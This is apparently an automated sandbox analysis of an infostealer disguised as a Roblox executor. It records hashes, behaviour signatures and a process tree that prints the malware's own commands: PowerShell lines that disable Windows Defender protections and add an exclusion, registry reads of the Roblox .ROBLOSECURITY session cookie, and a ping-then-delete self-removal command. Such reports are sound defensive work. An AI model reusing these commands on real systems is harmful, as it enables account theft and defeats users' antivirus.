Analysis
-
max time kernel
103s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
15/04/2025, 02:02
Static task
static1
General
-
Target
UltimaExecutorV.1.8.exe
-
Size
911KB
-
MD5
c1d3eba922b1c8200c576741321e30f0
-
SHA1
992b40e1883a7f034b99256084aa0130d738ba5c
-
SHA256
2257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7
-
SHA512
cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224
-
SSDEEP
24576:PX0dNTiM8RviVUwblP373RVTdQJtg8y6E:/0dNTiM8NiVUC373RheE
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/5184-3-0x0000000000400000-0x0000000000440000-memory.dmp family_umbral -
Umbral family
-
pid Process 4596 powershell.exe 2752 powershell.exe 4220 powershell.exe 4428 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts UltimaExecutorV.1.8.exe -
Executes dropped EXE 1 IoCs
pid Process 5184 UltimaExecutorV.1.8.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 discord.com 21 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2228 set thread context of 5184 2228 UltimaExecutorV.1.8.exe 88 -
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UltimaExecutorV.1.8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UltimaExecutorV.1.8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1020 cmd.exe 1412 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2404 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1412 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 5184 UltimaExecutorV.1.8.exe 4428 powershell.exe 4428 powershell.exe 4596 powershell.exe 4596 powershell.exe 2752 powershell.exe 2752 powershell.exe 4200 powershell.exe 4200 powershell.exe 4220 powershell.exe 4220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2228 UltimaExecutorV.1.8.exe Token: SeDebugPrivilege 5184 UltimaExecutorV.1.8.exe Token: SeIncreaseQuotaPrivilege 5160 wmic.exe Token: SeSecurityPrivilege 5160 wmic.exe Token: SeTakeOwnershipPrivilege 5160 wmic.exe Token: SeLoadDriverPrivilege 5160 wmic.exe Token: SeSystemProfilePrivilege 5160 wmic.exe Token: SeSystemtimePrivilege 5160 wmic.exe Token: SeProfSingleProcessPrivilege 5160 wmic.exe Token: SeIncBasePriorityPrivilege 5160 wmic.exe Token: SeCreatePagefilePrivilege 5160 wmic.exe Token: SeBackupPrivilege 5160 wmic.exe Token: SeRestorePrivilege 5160 wmic.exe Token: SeShutdownPrivilege 5160 wmic.exe Token: SeDebugPrivilege 5160 wmic.exe Token: SeSystemEnvironmentPrivilege 5160 wmic.exe Token: SeRemoteShutdownPrivilege 5160 wmic.exe Token: SeUndockPrivilege 5160 wmic.exe Token: SeManageVolumePrivilege 5160 wmic.exe Token: 33 5160 wmic.exe Token: 34 5160 wmic.exe Token: 35 5160 wmic.exe Token: 36 5160 wmic.exe Token: SeIncreaseQuotaPrivilege 5160 wmic.exe Token: SeSecurityPrivilege 5160 wmic.exe Token: SeTakeOwnershipPrivilege 5160 wmic.exe Token: SeLoadDriverPrivilege 5160 wmic.exe Token: SeSystemProfilePrivilege 5160 wmic.exe Token: SeSystemtimePrivilege 5160 wmic.exe Token: SeProfSingleProcessPrivilege 5160 wmic.exe Token: SeIncBasePriorityPrivilege 5160 wmic.exe Token: SeCreatePagefilePrivilege 5160 wmic.exe Token: SeBackupPrivilege 5160 wmic.exe Token: SeRestorePrivilege 5160 wmic.exe Token: SeShutdownPrivilege 5160 wmic.exe Token: SeDebugPrivilege 5160 wmic.exe Token: SeSystemEnvironmentPrivilege 5160 wmic.exe Token: SeRemoteShutdownPrivilege 5160 wmic.exe Token: SeUndockPrivilege 5160 wmic.exe Token: SeManageVolumePrivilege 5160 wmic.exe Token: 33 5160 wmic.exe Token: 34 5160 wmic.exe Token: 35 5160 wmic.exe Token: 36 5160 wmic.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeIncreaseQuotaPrivilege 1092 wmic.exe Token: SeSecurityPrivilege 1092 wmic.exe Token: SeTakeOwnershipPrivilege 1092 wmic.exe Token: SeLoadDriverPrivilege 1092 wmic.exe Token: SeSystemProfilePrivilege 1092 wmic.exe Token: SeSystemtimePrivilege 1092 wmic.exe Token: SeProfSingleProcessPrivilege 1092 wmic.exe Token: SeIncBasePriorityPrivilege 1092 wmic.exe Token: SeCreatePagefilePrivilege 1092 wmic.exe Token: SeBackupPrivilege 1092 wmic.exe Token: SeRestorePrivilege 1092 wmic.exe Token: SeShutdownPrivilege 1092 wmic.exe Token: SeDebugPrivilege 1092 wmic.exe Token: SeSystemEnvironmentPrivilege 1092 wmic.exe Token: SeRemoteShutdownPrivilege 1092 wmic.exe Token: SeUndockPrivilege 1092 wmic.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 2228 wrote to memory of 5184 2228 UltimaExecutorV.1.8.exe 88 PID 5184 wrote to memory of 5160 5184 UltimaExecutorV.1.8.exe 89 PID 5184 wrote to memory of 5160 5184 UltimaExecutorV.1.8.exe 89 PID 5184 wrote to memory of 5160 5184 UltimaExecutorV.1.8.exe 89 PID 5184 wrote to memory of 4412 5184 UltimaExecutorV.1.8.exe 92 PID 5184 wrote to memory of 4412 5184 UltimaExecutorV.1.8.exe 92 PID 5184 wrote to memory of 4412 5184 UltimaExecutorV.1.8.exe 92 PID 5184 wrote to memory of 4428 5184 UltimaExecutorV.1.8.exe 94 PID 5184 wrote to memory of 4428 5184 UltimaExecutorV.1.8.exe 94 PID 5184 wrote to memory of 4428 5184 UltimaExecutorV.1.8.exe 94 PID 5184 wrote to memory of 4596 5184 UltimaExecutorV.1.8.exe 96 PID 5184 wrote to memory of 4596 5184 UltimaExecutorV.1.8.exe 96 PID 5184 wrote to memory of 4596 5184 UltimaExecutorV.1.8.exe 96 PID 5184 wrote to memory of 2752 5184 UltimaExecutorV.1.8.exe 98 PID 5184 wrote to memory of 2752 5184 UltimaExecutorV.1.8.exe 98 PID 5184 wrote to memory of 2752 5184 UltimaExecutorV.1.8.exe 98 PID 5184 wrote to memory of 4200 5184 UltimaExecutorV.1.8.exe 100 PID 5184 wrote to memory of 4200 5184 UltimaExecutorV.1.8.exe 100 PID 5184 wrote to memory of 4200 5184 UltimaExecutorV.1.8.exe 100 PID 5184 wrote to memory of 1092 5184 UltimaExecutorV.1.8.exe 102 PID 5184 wrote to memory of 1092 5184 UltimaExecutorV.1.8.exe 102 PID 5184 wrote to memory of 1092 5184 UltimaExecutorV.1.8.exe 102 PID 5184 wrote to memory of 2452 5184 UltimaExecutorV.1.8.exe 104 PID 5184 wrote to memory of 2452 5184 UltimaExecutorV.1.8.exe 104 PID 5184 wrote to memory of 2452 5184 UltimaExecutorV.1.8.exe 104 PID 5184 wrote to memory of 5944 5184 UltimaExecutorV.1.8.exe 106 PID 5184 wrote to memory of 5944 5184 UltimaExecutorV.1.8.exe 106 PID 5184 wrote to memory of 5944 5184 UltimaExecutorV.1.8.exe 106 PID 5184 wrote to memory of 4220 5184 UltimaExecutorV.1.8.exe 108 PID 5184 wrote to memory of 4220 5184 UltimaExecutorV.1.8.exe 108 PID 5184 wrote to memory of 4220 5184 UltimaExecutorV.1.8.exe 108 PID 5184 wrote to memory of 2404 5184 UltimaExecutorV.1.8.exe 110 PID 5184 wrote to memory of 2404 5184 UltimaExecutorV.1.8.exe 110 PID 5184 wrote to memory of 2404 5184 UltimaExecutorV.1.8.exe 110 PID 5184 wrote to memory of 1020 5184 UltimaExecutorV.1.8.exe 112 PID 5184 wrote to memory of 1020 5184 UltimaExecutorV.1.8.exe 112 PID 5184 wrote to memory of 1020 5184 UltimaExecutorV.1.8.exe 112 PID 1020 wrote to memory of 1412 1020 cmd.exe 114 PID 1020 wrote to memory of 1412 1020 cmd.exe 114 PID 1020 wrote to memory of 1412 1020 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4412 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe"C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe"C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5184 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
-
C:\Windows\SysWOW64\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- System Location Discovery: System Language Discovery
PID:2452
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:5944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4220
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:2404
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\UltimaExecutorV.1.8.exe" && pause3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\PING.EXEping localhost4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1412
-
-
-
Network
MITRE ATT&CK Enterprise v16
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD58afa207700ee7e193a4819ca0b25374b
SHA11ede03521aabf2e3addefde82a5aa28f87df1855
SHA25639f47ed7ccac72b65e9f92806f52fe8b80cce7f11fd425a69551ae41dd848bab
SHA5123824350f33e5e05f27faf23189e4329e371a1d989126fbe957a4da4752ddd9b1fcae7d0b231109285b239a616d4996e34c273542da6ea241c494797c77ef58f0
-
Filesize
17KB
MD56c4dbc33aa1896f7f274909869acab21
SHA158cef0e9ea4033ee92b5295eed5c2191615c7772
SHA256a2779bc87fd766da50624278484246240e670f8750e7b1a63a761d7586e58d6f
SHA512dd9f36a6edcf57b00720d7f3aecb96e9ec5329e753acd16c4487896a9165195bb4b6715e3573a642818279677358701acfc15308ad347b039068f00786017b29
-
Filesize
18KB
MD50f03815c0e7daa1be0266b300f8ebcf8
SHA17484a14a931f69819539b8c9d71f9ff4c8319d99
SHA25652c089665d26cf2f6070fc24824f3a4fce9ad614ff6d12857a56fd2540ca6b66
SHA512ea7cc422730d4a76e5bce0368997b0f0a0f43977f4bec6de95feada37841ded9dc0b865e34032df0b50c0c6596b84717c798962af5b359b45639bd12dd44bbcf
-
Filesize
15KB
MD51af9d5db3a52f58c4dfba2e7c9dfc6e6
SHA1e12822bf05ebf063978502316cb46dcf004d12b9
SHA256403f9165c0fbb2b6cdb87de7ca240ecffd19a75e282bf68a26c074ac53934424
SHA512a0f214e33e4a72430780e96d5eb59184f7c097b61b12e40d5dcac442465ddbd6fe0ad256ce35d0f08d739724b5742e183271e4f4edbf4816a745a2427f33f32f
-
Filesize
911KB
MD5c1d3eba922b1c8200c576741321e30f0
SHA1992b40e1883a7f034b99256084aa0130d738ba5c
SHA2562257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7
SHA512cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82